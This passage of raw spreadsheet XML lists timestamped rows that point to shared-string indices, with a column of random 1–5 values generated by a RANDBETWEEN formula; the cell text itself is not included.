        <v>10</v>
      </c>
      <c r="D24906" t="s">
        <v>6</v>
      </c>
      <c r="E24906" s="2" t="s">
        <v>22602</v>
      </c>
      <c r="F24906">
        <f t="shared" ca="1" si="389"/>
        <v>3</v>
      </c>
    </row>
    <row r="24907" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A24907" s="1">
        <v>42971.759930555556</v>
      </c>
      <c r="C24907" t="s">
        <v>144</v>
      </c>
      <c r="E24907" s="2" t="s">
        <v>22603</v>
      </c>
      <c r="F24907">
        <f t="shared" ca="1" si="389"/>
        <v>1</v>
      </c>
    </row>
    <row r="24908" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24908" s="1">
        <v>42971.721747685187</v>
      </c>
      <c r="C24908" t="s">
        <v>10</v>
      </c>
      <c r="D24908" t="s">
        <v>17</v>
      </c>
      <c r="E24908" t="s">
        <v>22604</v>
      </c>
      <c r="F24908">
        <f t="shared" ca="1" si="389"/>
        <v>5</v>
      </c>
    </row>
    <row r="24909" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24909" s="1">
        <v>42971.680046296293</v>
      </c>
      <c r="C24909" t="s">
        <v>10</v>
      </c>
      <c r="D24909" t="s">
        <v>56</v>
      </c>
      <c r="E24909" s="2" t="s">
        <v>22605</v>
      </c>
      <c r="F24909">
        <f t="shared" ca="1" si="389"/>
        <v>3</v>
      </c>
    </row>
    <row r="24910" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24910" s="1">
        <v>42971.677488425928</v>
      </c>
      <c r="C24910" t="s">
        <v>10</v>
      </c>
      <c r="D24910" t="s">
        <v>11</v>
      </c>
      <c r="E24910" t="s">
        <v>22606</v>
      </c>
      <c r="F24910">
        <f t="shared" ca="1" si="389"/>
        <v>1</v>
      </c>
    </row>
    <row r="24911" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24911" s="1">
        <v>42971.659166666665</v>
      </c>
      <c r="C24911" t="s">
        <v>10</v>
      </c>
      <c r="D24911" t="s">
        <v>6</v>
      </c>
      <c r="E24911" t="s">
        <v>22607</v>
      </c>
      <c r="F24911">
        <f t="shared" ca="1" si="389"/>
        <v>2</v>
      </c>
    </row>
    <row r="24912" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24912" s="1">
        <v>42971.636192129627</v>
      </c>
      <c r="C24912" t="s">
        <v>10</v>
      </c>
      <c r="D24912" t="s">
        <v>6</v>
      </c>
      <c r="E24912" t="s">
        <v>22608</v>
      </c>
      <c r="F24912">
        <f t="shared" ca="1" si="389"/>
        <v>1</v>
      </c>
    </row>
    <row r="24913" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24913" s="1">
        <v>42971.628483796296</v>
      </c>
      <c r="C24913" t="s">
        <v>10</v>
      </c>
      <c r="D24913" t="s">
        <v>39</v>
      </c>
      <c r="E24913" s="2" t="s">
        <v>22609</v>
      </c>
      <c r="F24913">
        <f t="shared" ca="1" si="389"/>
        <v>1</v>
      </c>
    </row>
    <row r="24914" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24914" s="1">
        <v>42971.623831018522</v>
      </c>
      <c r="C24914" t="s">
        <v>10</v>
      </c>
      <c r="D24914" t="s">
        <v>23</v>
      </c>
      <c r="E24914" t="s">
        <v>22610</v>
      </c>
      <c r="F24914">
        <f t="shared" ca="1" si="389"/>
        <v>2</v>
      </c>
    </row>
    <row r="24915" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24915" s="1">
        <v>42971.610092592593</v>
      </c>
      <c r="C24915" t="s">
        <v>10</v>
      </c>
      <c r="D24915" t="s">
        <v>52</v>
      </c>
      <c r="E24915" t="s">
        <v>22611</v>
      </c>
      <c r="F24915">
        <f t="shared" ca="1" si="389"/>
        <v>5</v>
      </c>
    </row>
    <row r="24916" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24916" s="1">
        <v>42971.594699074078</v>
      </c>
      <c r="C24916" t="s">
        <v>10</v>
      </c>
      <c r="D24916" t="s">
        <v>11</v>
      </c>
      <c r="E24916" t="s">
        <v>22612</v>
      </c>
      <c r="F24916">
        <f t="shared" ca="1" si="389"/>
        <v>2</v>
      </c>
    </row>
    <row r="24917" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24917" s="1">
        <v>42971.590844907405</v>
      </c>
      <c r="C24917" t="s">
        <v>10</v>
      </c>
      <c r="D24917" t="s">
        <v>52</v>
      </c>
      <c r="E24917" t="s">
        <v>22613</v>
      </c>
      <c r="F24917">
        <f t="shared" ca="1" si="389"/>
        <v>5</v>
      </c>
    </row>
    <row r="24918" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24918" s="1">
        <v>42971.570844907408</v>
      </c>
      <c r="C24918" t="s">
        <v>559</v>
      </c>
      <c r="E24918" s="2" t="s">
        <v>22614</v>
      </c>
      <c r="F24918">
        <f t="shared" ca="1" si="389"/>
        <v>4</v>
      </c>
    </row>
    <row r="24919" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A24919" s="1">
        <v>42971.523634259262</v>
      </c>
      <c r="C24919" t="s">
        <v>1080</v>
      </c>
      <c r="E24919" s="2" t="s">
        <v>22615</v>
      </c>
      <c r="F24919">
        <f t="shared" ca="1" si="389"/>
        <v>3</v>
      </c>
    </row>
    <row r="24920" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24920" s="1">
        <v>42971.500891203701</v>
      </c>
      <c r="C24920" t="s">
        <v>10</v>
      </c>
      <c r="D24920" t="s">
        <v>112</v>
      </c>
      <c r="E24920" t="s">
        <v>22616</v>
      </c>
      <c r="F24920">
        <f t="shared" ca="1" si="389"/>
        <v>1</v>
      </c>
    </row>
    <row r="24921" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24921" s="1">
        <v>42971.483854166669</v>
      </c>
      <c r="C24921" t="s">
        <v>10</v>
      </c>
      <c r="D24921" t="s">
        <v>271</v>
      </c>
      <c r="E24921" t="s">
        <v>22617</v>
      </c>
      <c r="F24921">
        <f t="shared" ca="1" si="389"/>
        <v>5</v>
      </c>
    </row>
    <row r="24922" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A24922" s="1">
        <v>42971.479791666665</v>
      </c>
      <c r="C24922" t="s">
        <v>10</v>
      </c>
      <c r="D24922" t="s">
        <v>374</v>
      </c>
      <c r="E24922" s="2" t="s">
        <v>22618</v>
      </c>
      <c r="F24922">
        <f t="shared" ca="1" si="389"/>
        <v>2</v>
      </c>
    </row>
    <row r="24923" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24923" s="1">
        <v>42971.463761574072</v>
      </c>
      <c r="C24923" t="s">
        <v>197</v>
      </c>
      <c r="E24923" t="s">
        <v>22619</v>
      </c>
      <c r="F24923">
        <f t="shared" ca="1" si="389"/>
        <v>4</v>
      </c>
    </row>
    <row r="24924" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A24924" s="1">
        <v>42971.445868055554</v>
      </c>
      <c r="C24924" t="s">
        <v>10</v>
      </c>
      <c r="D24924" t="s">
        <v>178</v>
      </c>
      <c r="E24924" s="2" t="s">
        <v>22620</v>
      </c>
      <c r="F24924">
        <f t="shared" ca="1" si="389"/>
        <v>1</v>
      </c>
    </row>
    <row r="24925" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24925" s="1">
        <v>42971.441342592596</v>
      </c>
      <c r="C24925" t="s">
        <v>48</v>
      </c>
      <c r="E24925" t="s">
        <v>22621</v>
      </c>
      <c r="F24925">
        <f t="shared" ca="1" si="389"/>
        <v>3</v>
      </c>
    </row>
    <row r="24926" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24926" s="1">
        <v>42971.422175925924</v>
      </c>
      <c r="C24926" t="s">
        <v>10</v>
      </c>
      <c r="D24926" t="s">
        <v>163</v>
      </c>
      <c r="E24926" t="s">
        <v>22622</v>
      </c>
      <c r="F24926">
        <f t="shared" ca="1" si="389"/>
        <v>5</v>
      </c>
    </row>
    <row r="24927" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24927" s="1">
        <v>42971.411423611113</v>
      </c>
      <c r="C24927" t="s">
        <v>6</v>
      </c>
      <c r="D24927" t="s">
        <v>821</v>
      </c>
      <c r="E24927" t="s">
        <v>22623</v>
      </c>
      <c r="F24927">
        <f t="shared" ca="1" si="389"/>
        <v>3</v>
      </c>
    </row>
    <row r="24928" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24928" s="1">
        <v>42971.40824074074</v>
      </c>
      <c r="C24928" t="s">
        <v>6</v>
      </c>
      <c r="D24928" t="s">
        <v>25</v>
      </c>
      <c r="E24928" t="s">
        <v>22624</v>
      </c>
      <c r="F24928">
        <f t="shared" ca="1" si="389"/>
        <v>3</v>
      </c>
    </row>
    <row r="24929" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24929" s="1">
        <v>42971.405150462961</v>
      </c>
      <c r="C24929" t="s">
        <v>1068</v>
      </c>
      <c r="E24929" s="2" t="s">
        <v>22625</v>
      </c>
      <c r="F24929">
        <f t="shared" ca="1" si="389"/>
        <v>1</v>
      </c>
    </row>
    <row r="24930" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24930" s="1">
        <v>42971.392094907409</v>
      </c>
      <c r="C24930" t="s">
        <v>10</v>
      </c>
      <c r="D24930" t="s">
        <v>17</v>
      </c>
      <c r="E24930" t="s">
        <v>22626</v>
      </c>
      <c r="F24930">
        <f t="shared" ca="1" si="389"/>
        <v>5</v>
      </c>
    </row>
    <row r="24931" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A24931" s="1">
        <v>42971.391238425924</v>
      </c>
      <c r="C24931" t="s">
        <v>71</v>
      </c>
      <c r="E24931" s="2" t="s">
        <v>22627</v>
      </c>
      <c r="F24931">
        <f t="shared" ca="1" si="389"/>
        <v>3</v>
      </c>
    </row>
    <row r="24932" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24932" s="1">
        <v>42971.385046296295</v>
      </c>
      <c r="C24932" t="s">
        <v>41</v>
      </c>
      <c r="D24932" t="s">
        <v>312</v>
      </c>
      <c r="E24932" t="s">
        <v>22628</v>
      </c>
      <c r="F24932">
        <f t="shared" ca="1" si="389"/>
        <v>2</v>
      </c>
    </row>
    <row r="24933" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24933" s="1">
        <v>42971.355717592596</v>
      </c>
      <c r="C24933" t="s">
        <v>41</v>
      </c>
      <c r="E24933">
        <v>9929591534</v>
      </c>
      <c r="F24933">
        <f t="shared" ca="1" si="389"/>
        <v>2</v>
      </c>
    </row>
    <row r="24934" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A24934" s="1">
        <v>42971.352106481485</v>
      </c>
      <c r="C24934" t="s">
        <v>65</v>
      </c>
      <c r="E24934" s="2" t="s">
        <v>22629</v>
      </c>
      <c r="F24934">
        <f t="shared" ca="1" si="389"/>
        <v>3</v>
      </c>
    </row>
    <row r="24935" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24935" s="1">
        <v>42971.346550925926</v>
      </c>
      <c r="C24935" t="s">
        <v>10</v>
      </c>
      <c r="D24935" t="s">
        <v>178</v>
      </c>
      <c r="E24935" t="s">
        <v>22630</v>
      </c>
      <c r="F24935">
        <f t="shared" ca="1" si="389"/>
        <v>2</v>
      </c>
    </row>
    <row r="24936" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24936" s="1">
        <v>42971.244398148148</v>
      </c>
      <c r="C24936" t="s">
        <v>563</v>
      </c>
      <c r="E24936" s="2" t="s">
        <v>22631</v>
      </c>
      <c r="F24936">
        <f t="shared" ca="1" si="389"/>
        <v>1</v>
      </c>
    </row>
    <row r="24937" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24937" s="1">
        <v>42971.192986111113</v>
      </c>
      <c r="C24937" t="s">
        <v>41</v>
      </c>
      <c r="E24937" t="s">
        <v>22632</v>
      </c>
      <c r="F24937">
        <f t="shared" ca="1" si="389"/>
        <v>4</v>
      </c>
    </row>
    <row r="24938" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24938" s="1">
        <v>42971.175787037035</v>
      </c>
      <c r="C24938" t="s">
        <v>60</v>
      </c>
      <c r="E24938" s="2" t="s">
        <v>22633</v>
      </c>
      <c r="F24938">
        <f t="shared" ca="1" si="389"/>
        <v>1</v>
      </c>
    </row>
    <row r="24939" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24939" s="1">
        <v>42971.164375</v>
      </c>
      <c r="C24939" t="s">
        <v>41</v>
      </c>
      <c r="F24939">
        <f t="shared" ca="1" si="389"/>
        <v>5</v>
      </c>
    </row>
    <row r="24940" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A24940" s="1">
        <v>42971.093993055554</v>
      </c>
      <c r="C24940" t="s">
        <v>17</v>
      </c>
      <c r="E24940" s="2" t="s">
        <v>22634</v>
      </c>
      <c r="F24940">
        <f t="shared" ca="1" si="389"/>
        <v>1</v>
      </c>
    </row>
    <row r="24941" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A24941" s="1">
        <v>42971.093298611115</v>
      </c>
      <c r="C24941" t="s">
        <v>41</v>
      </c>
      <c r="E24941" s="2" t="s">
        <v>22635</v>
      </c>
      <c r="F24941">
        <f t="shared" ca="1" si="389"/>
        <v>3</v>
      </c>
    </row>
    <row r="24942" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24942" s="1">
        <v>42971.091087962966</v>
      </c>
      <c r="C24942" t="s">
        <v>41</v>
      </c>
      <c r="E24942" t="s">
        <v>22636</v>
      </c>
      <c r="F24942">
        <f t="shared" ca="1" si="389"/>
        <v>2</v>
      </c>
    </row>
    <row r="24943" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24943" s="1">
        <v>42971.077650462961</v>
      </c>
      <c r="C24943" t="s">
        <v>41</v>
      </c>
      <c r="E24943" t="s">
        <v>22637</v>
      </c>
      <c r="F24943">
        <f t="shared" ca="1" si="389"/>
        <v>3</v>
      </c>
    </row>
    <row r="24944" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A24944" s="1">
        <v>42971.036111111112</v>
      </c>
      <c r="C24944" t="s">
        <v>229</v>
      </c>
      <c r="E24944" s="2" t="s">
        <v>22638</v>
      </c>
      <c r="F24944">
        <f t="shared" ca="1" si="389"/>
        <v>3</v>
      </c>
    </row>
    <row r="24945" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24945" s="1">
        <v>42970.976979166669</v>
      </c>
      <c r="C24945" t="s">
        <v>118</v>
      </c>
      <c r="E24945" t="s">
        <v>22639</v>
      </c>
      <c r="F24945">
        <f t="shared" ca="1" si="389"/>
        <v>2</v>
      </c>
    </row>
    <row r="24946" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24946" s="1">
        <v>42970.747291666667</v>
      </c>
      <c r="C24946" t="s">
        <v>10</v>
      </c>
      <c r="D24946" t="s">
        <v>192</v>
      </c>
      <c r="E24946" t="s">
        <v>22640</v>
      </c>
      <c r="F24946">
        <f t="shared" ca="1" si="389"/>
        <v>5</v>
      </c>
    </row>
    <row r="24947" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A24947" s="1">
        <v>42970.740497685183</v>
      </c>
      <c r="C24947" t="s">
        <v>16</v>
      </c>
      <c r="E24947" s="2" t="s">
        <v>22641</v>
      </c>
      <c r="F24947">
        <f t="shared" ca="1" si="389"/>
        <v>3</v>
      </c>
    </row>
    <row r="24948" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24948" s="1">
        <v>42970.705509259256</v>
      </c>
      <c r="C24948" t="s">
        <v>6</v>
      </c>
      <c r="D24948" t="s">
        <v>25</v>
      </c>
      <c r="E24948" s="2" t="s">
        <v>22642</v>
      </c>
      <c r="F24948">
        <f t="shared" ca="1" si="389"/>
        <v>2</v>
      </c>
    </row>
    <row r="24949" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24949" s="1">
        <v>42970.698900462965</v>
      </c>
      <c r="C24949" t="s">
        <v>10</v>
      </c>
      <c r="D24949" t="s">
        <v>36</v>
      </c>
      <c r="E24949" t="s">
        <v>22643</v>
      </c>
      <c r="F24949">
        <f t="shared" ca="1" si="389"/>
        <v>5</v>
      </c>
    </row>
    <row r="24950" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A24950" s="1">
        <v>42970.697893518518</v>
      </c>
      <c r="C24950" t="s">
        <v>10</v>
      </c>
      <c r="D24950" t="s">
        <v>6</v>
      </c>
      <c r="E24950" s="2" t="s">
        <v>22644</v>
      </c>
      <c r="F24950">
        <f t="shared" ca="1" si="389"/>
        <v>1</v>
      </c>
    </row>
    <row r="24951" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24951" s="1">
        <v>42970.696793981479</v>
      </c>
      <c r="C24951" t="s">
        <v>10</v>
      </c>
      <c r="D24951" t="s">
        <v>163</v>
      </c>
      <c r="F24951">
        <f t="shared" ca="1" si="389"/>
        <v>3</v>
      </c>
    </row>
    <row r="24952" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24952" s="1">
        <v>42970.666087962964</v>
      </c>
      <c r="C24952" t="s">
        <v>6</v>
      </c>
      <c r="D24952" t="s">
        <v>25</v>
      </c>
      <c r="E24952" t="s">
        <v>22645</v>
      </c>
      <c r="F24952">
        <f t="shared" ca="1" si="389"/>
        <v>3</v>
      </c>
    </row>
    <row r="24953" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24953" s="1">
        <v>42970.665763888886</v>
      </c>
      <c r="C24953" t="s">
        <v>10</v>
      </c>
      <c r="D24953" t="s">
        <v>52</v>
      </c>
      <c r="E24953" t="s">
        <v>22646</v>
      </c>
      <c r="F24953">
        <f t="shared" ca="1" si="389"/>
        <v>2</v>
      </c>
    </row>
    <row r="24954" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24954" s="1">
        <v>42970.661469907405</v>
      </c>
      <c r="C24954" t="s">
        <v>10</v>
      </c>
      <c r="D24954" t="s">
        <v>158</v>
      </c>
      <c r="E24954" t="s">
        <v>22647</v>
      </c>
      <c r="F24954">
        <f t="shared" ca="1" si="389"/>
        <v>2</v>
      </c>
    </row>
    <row r="24955" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24955" s="1">
        <v>42970.638252314813</v>
      </c>
      <c r="C24955" t="s">
        <v>10</v>
      </c>
      <c r="D24955" t="s">
        <v>163</v>
      </c>
      <c r="E24955" t="s">
        <v>22648</v>
      </c>
      <c r="F24955">
        <f t="shared" ca="1" si="389"/>
        <v>5</v>
      </c>
    </row>
    <row r="24956" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24956" s="1">
        <v>42970.63726851852</v>
      </c>
      <c r="C24956" t="s">
        <v>10</v>
      </c>
      <c r="D24956" t="s">
        <v>163</v>
      </c>
      <c r="F24956">
        <f t="shared" ca="1" si="389"/>
        <v>1</v>
      </c>
    </row>
    <row r="24957" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24957" s="1">
        <v>42970.627592592595</v>
      </c>
      <c r="C24957" t="s">
        <v>10</v>
      </c>
      <c r="D24957" t="s">
        <v>86</v>
      </c>
      <c r="E24957" t="s">
        <v>22649</v>
      </c>
      <c r="F24957">
        <f t="shared" ca="1" si="389"/>
        <v>4</v>
      </c>
    </row>
    <row r="24958" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A24958" s="1">
        <v>42970.618576388886</v>
      </c>
      <c r="C24958" t="s">
        <v>10</v>
      </c>
      <c r="D24958" t="s">
        <v>52</v>
      </c>
      <c r="E24958" s="2" t="s">
        <v>22650</v>
      </c>
      <c r="F24958">
        <f t="shared" ca="1" si="389"/>
        <v>3</v>
      </c>
    </row>
    <row r="24959" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24959" s="1">
        <v>42970.611886574072</v>
      </c>
      <c r="C24959" t="s">
        <v>48</v>
      </c>
      <c r="E24959" t="s">
        <v>22651</v>
      </c>
      <c r="F24959">
        <f t="shared" ca="1" si="389"/>
        <v>5</v>
      </c>
    </row>
    <row r="24960" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24960" s="1">
        <v>42970.592627314814</v>
      </c>
      <c r="C24960" t="s">
        <v>10</v>
      </c>
      <c r="D24960" t="s">
        <v>158</v>
      </c>
      <c r="E24960" t="s">
        <v>22652</v>
      </c>
      <c r="F24960">
        <f t="shared" ca="1" si="389"/>
        <v>1</v>
      </c>
    </row>
    <row r="24961" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A24961" s="1">
        <v>42970.591273148151</v>
      </c>
      <c r="C24961" t="s">
        <v>10</v>
      </c>
      <c r="D24961" t="s">
        <v>163</v>
      </c>
      <c r="E24961" s="2" t="s">
        <v>22653</v>
      </c>
      <c r="F24961">
        <f t="shared" ca="1" si="389"/>
        <v>3</v>
      </c>
    </row>
    <row r="24962" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24962" s="1">
        <v>42970.589212962965</v>
      </c>
      <c r="C24962" t="s">
        <v>10</v>
      </c>
      <c r="D24962" t="s">
        <v>80</v>
      </c>
      <c r="E24962" t="s">
        <v>22654</v>
      </c>
      <c r="F24962">
        <f t="shared" ref="F24962:F25025" ca="1" si="390">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="24963" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24963" s="1">
        <v>42970.58222222222</v>
      </c>
      <c r="C24963" t="s">
        <v>197</v>
      </c>
      <c r="E24963" s="2" t="s">
        <v>22655</v>
      </c>
      <c r="F24963">
        <f t="shared" ca="1" si="390"/>
        <v>2</v>
      </c>
    </row>
    <row r="24964" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24964" s="1">
        <v>42970.557164351849</v>
      </c>
      <c r="C24964" t="s">
        <v>10</v>
      </c>
      <c r="D24964" t="s">
        <v>94</v>
      </c>
      <c r="E24964" s="2" t="s">
        <v>22656</v>
      </c>
      <c r="F24964">
        <f t="shared" ca="1" si="390"/>
        <v>5</v>
      </c>
    </row>
    <row r="24965" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A24965" s="1">
        <v>42970.55678240741</v>
      </c>
      <c r="C24965" t="s">
        <v>10</v>
      </c>
      <c r="D24965" t="s">
        <v>6</v>
      </c>
      <c r="E24965" s="2" t="s">
        <v>22657</v>
      </c>
      <c r="F24965">
        <f t="shared" ca="1" si="390"/>
        <v>2</v>
      </c>
    </row>
    <row r="24966" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24966" s="1">
        <v>42970.507673611108</v>
      </c>
      <c r="C24966" t="s">
        <v>1408</v>
      </c>
      <c r="E24966" t="s">
        <v>22658</v>
      </c>
      <c r="F24966">
        <f t="shared" ca="1" si="390"/>
        <v>5</v>
      </c>
    </row>
    <row r="24967" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A24967" s="1">
        <v>42970.498090277775</v>
      </c>
      <c r="C24967" t="s">
        <v>559</v>
      </c>
      <c r="E24967" s="2" t="s">
        <v>22659</v>
      </c>
      <c r="F24967">
        <f t="shared" ca="1" si="390"/>
        <v>1</v>
      </c>
    </row>
    <row r="24968" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A24968" s="1">
        <v>42970.487361111111</v>
      </c>
      <c r="C24968" t="s">
        <v>41</v>
      </c>
      <c r="E24968" s="2" t="s">
        <v>22660</v>
      </c>
      <c r="F24968">
        <f t="shared" ca="1" si="390"/>
        <v>3</v>
      </c>
    </row>
    <row r="24969" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A24969" s="1">
        <v>42970.482997685183</v>
      </c>
      <c r="C24969" t="s">
        <v>344</v>
      </c>
      <c r="E24969" s="2" t="s">
        <v>22661</v>
      </c>
      <c r="F24969">
        <f t="shared" ca="1" si="390"/>
        <v>2</v>
      </c>
    </row>
    <row r="24970" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24970" s="1">
        <v>42970.477905092594</v>
      </c>
      <c r="C24970" t="s">
        <v>10</v>
      </c>
      <c r="D24970" t="s">
        <v>89</v>
      </c>
      <c r="E24970" t="s">
        <v>22662</v>
      </c>
      <c r="F24970">
        <f t="shared" ca="1" si="390"/>
        <v>1</v>
      </c>
    </row>
    <row r="24971" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24971" s="1">
        <v>42970.454259259262</v>
      </c>
      <c r="C24971" t="s">
        <v>41</v>
      </c>
      <c r="E24971" t="s">
        <v>22663</v>
      </c>
      <c r="F24971">
        <f t="shared" ca="1" si="390"/>
        <v>5</v>
      </c>
    </row>
    <row r="24972" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A24972" s="1">
        <v>42970.452210648145</v>
      </c>
      <c r="C24972" t="s">
        <v>16</v>
      </c>
      <c r="E24972" s="2" t="s">
        <v>22664</v>
      </c>
      <c r="F24972">
        <f t="shared" ca="1" si="390"/>
        <v>4</v>
      </c>
    </row>
    <row r="24973" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A24973" s="1">
        <v>42970.442789351851</v>
      </c>
      <c r="C24973" t="s">
        <v>10</v>
      </c>
      <c r="D24973" t="s">
        <v>244</v>
      </c>
      <c r="E24973" s="2" t="s">
        <v>22665</v>
      </c>
      <c r="F24973">
        <f t="shared" ca="1" si="390"/>
        <v>5</v>
      </c>
    </row>
    <row r="24974" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24974" s="1">
        <v>42970.433240740742</v>
      </c>
      <c r="C24974" t="s">
        <v>10</v>
      </c>
      <c r="D24974" t="s">
        <v>52</v>
      </c>
      <c r="E24974" t="s">
        <v>22666</v>
      </c>
      <c r="F24974">
        <f t="shared" ca="1" si="390"/>
        <v>5</v>
      </c>
    </row>
    <row r="24975" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A24975" s="1">
        <v>42970.430844907409</v>
      </c>
      <c r="C24975" t="s">
        <v>60</v>
      </c>
      <c r="E24975" s="2" t="s">
        <v>22667</v>
      </c>
      <c r="F24975">
        <f t="shared" ca="1" si="390"/>
        <v>4</v>
      </c>
    </row>
    <row r="24976" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A24976" s="1">
        <v>42970.430798611109</v>
      </c>
      <c r="C24976" t="s">
        <v>60</v>
      </c>
      <c r="E24976" s="2" t="s">
        <v>22667</v>
      </c>
      <c r="F24976">
        <f t="shared" ca="1" si="390"/>
        <v>4</v>
      </c>
    </row>
    <row r="24977" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24977" s="1">
        <v>42970.428819444445</v>
      </c>
      <c r="C24977" t="s">
        <v>48</v>
      </c>
      <c r="E24977" t="s">
        <v>22668</v>
      </c>
      <c r="F24977">
        <f t="shared" ca="1" si="390"/>
        <v>1</v>
      </c>
    </row>
    <row r="24978" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24978" s="1">
        <v>42970.377465277779</v>
      </c>
      <c r="C24978" t="s">
        <v>260</v>
      </c>
      <c r="E24978" t="s">
        <v>22669</v>
      </c>
      <c r="F24978">
        <f t="shared" ca="1" si="390"/>
        <v>2</v>
      </c>
    </row>
    <row r="24979" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A24979" s="1">
        <v>42970.374976851854</v>
      </c>
      <c r="C24979" t="s">
        <v>10</v>
      </c>
      <c r="D24979" t="s">
        <v>89</v>
      </c>
      <c r="E24979" s="2" t="s">
        <v>22670</v>
      </c>
      <c r="F24979">
        <f t="shared" ca="1" si="390"/>
        <v>3</v>
      </c>
    </row>
    <row r="24980" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24980" s="1">
        <v>42970.356076388889</v>
      </c>
      <c r="C24980" t="s">
        <v>10</v>
      </c>
      <c r="D24980" t="s">
        <v>23</v>
      </c>
      <c r="E24980" s="2" t="s">
        <v>22671</v>
      </c>
      <c r="F24980">
        <f t="shared" ca="1" si="390"/>
        <v>5</v>
      </c>
    </row>
    <row r="24981" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24981" s="1">
        <v>42970.339467592596</v>
      </c>
      <c r="C24981" t="s">
        <v>41</v>
      </c>
      <c r="E24981" t="s">
        <v>22672</v>
      </c>
      <c r="F24981">
        <f t="shared" ca="1" si="390"/>
        <v>5</v>
      </c>
    </row>
    <row r="24982" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A24982" s="1">
        <v>42970.310277777775</v>
      </c>
      <c r="C24982" t="s">
        <v>71</v>
      </c>
      <c r="E24982" s="2" t="s">
        <v>22673</v>
      </c>
      <c r="F24982">
        <f t="shared" ca="1" si="390"/>
        <v>4</v>
      </c>
    </row>
    <row r="24983" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24983" s="1">
        <v>42970.304363425923</v>
      </c>
      <c r="C24983" t="s">
        <v>97</v>
      </c>
      <c r="E24983" t="s">
        <v>22674</v>
      </c>
      <c r="F24983">
        <f t="shared" ca="1" si="390"/>
        <v>2</v>
      </c>
    </row>
    <row r="24984" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24984" s="1">
        <v>42970.266921296294</v>
      </c>
      <c r="C24984" t="s">
        <v>41</v>
      </c>
      <c r="E24984" s="2" t="s">
        <v>22675</v>
      </c>
      <c r="F24984">
        <f t="shared" ca="1" si="390"/>
        <v>5</v>
      </c>
    </row>
    <row r="24985" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24985" s="1">
        <v>42970.265810185185</v>
      </c>
      <c r="C24985" t="s">
        <v>41</v>
      </c>
      <c r="E24985" s="2" t="s">
